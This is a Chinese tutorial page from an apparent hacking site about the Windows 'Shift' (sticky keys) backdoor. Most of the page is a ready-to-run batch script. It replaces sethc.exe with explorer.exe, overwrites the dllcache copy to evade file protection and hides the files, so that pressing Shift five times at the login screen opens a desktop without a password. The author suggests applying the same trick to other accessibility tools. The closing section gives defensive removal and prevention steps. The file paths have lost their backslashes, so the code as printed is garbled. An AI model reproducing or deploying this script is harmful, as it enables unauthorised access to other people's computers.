shift后门批处理代码与shift后门清除方法分享_黑客入侵教程-查字典教程网
shift后门批处理代码与shift后门清除方法分享
shift后门批处理代码与shift后门清除方法分享
发布时间:2016-12-21 来源:查字典编辑
摘要:在cmd下输入以下命令...下面再打开记事本把底下的代码粘贴进去。复制代码代码如下:@echooffclsecho~~~~~~~~~~~~~...

在cmd下输入以下命令...

下面再打开记事本把底下的代码粘贴进去。

复制代码代码如下:

@echo off

cls

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo.

echo Shift后门

echo.sproink

@copy c:windowsexplorer.exe c:windowssystem32sethc.exe

@copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe

@attrib c:windowssystem32sethc.exe +h

@attrib c:windowssystem32dllcachesethc.exe +h

echo 使用方法:本文件执行完毕后,

echo 在终端界面按Shift 5次即可登陆系统!

echo.

copy c:windowsexplorer.exe c:windowssystem32sethc.exe

echo 完成百分之 50

copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe

echo 完成百分之 80

attrib c:windowssystem32sethc.exe +h

echo 完成百分之 90

attrib c:windowssystem32dllcachesethc.exe +h

echo 完成百分之 100

cls

echo.

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo 后门安装完毕!

echo.

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echo.

echo. & pause

exit

其实原理很简单,就是利用了explorer.exe 这个资源管理器进程替换调用的shift 默认启动程序,然后还覆盖了windows的文件保护原文件(防止文件保护系统检测到文件修改,会还原这些原来的程序,造成copy文件失去作用),当调用shift是其实调用的真正程序是桌面进程。Lyon: 同理,你也可以利用此方法替换屏幕键盘及放大镜和组合键:win+u,其它自己可以拓展思路^_^

下面介绍如何清除此后门...

打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾

还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问

shift后门的预防解决办法:预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键

已经中了的话

attrib c:windowssystem32sethc.exe -h

attrib c:windowssystem32dllcachesethc.exe -h

拷贝新的 c:windowssystem32sethc.exe 文件到 c:windowssystem32目录下;拷贝新的c:windowssystem32dllcachesethc.exe到c:windowssystem32dllcache目录下

还有就是在c:windowssystem32及c:windowssystem32dllcache下找到sethc.exe 禁止所有用户权限或拒绝访问等,也可:)建议利用前者恢复。。。

收工!

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新黑客入侵学习
    热门黑客入侵学习
    网络安全子分类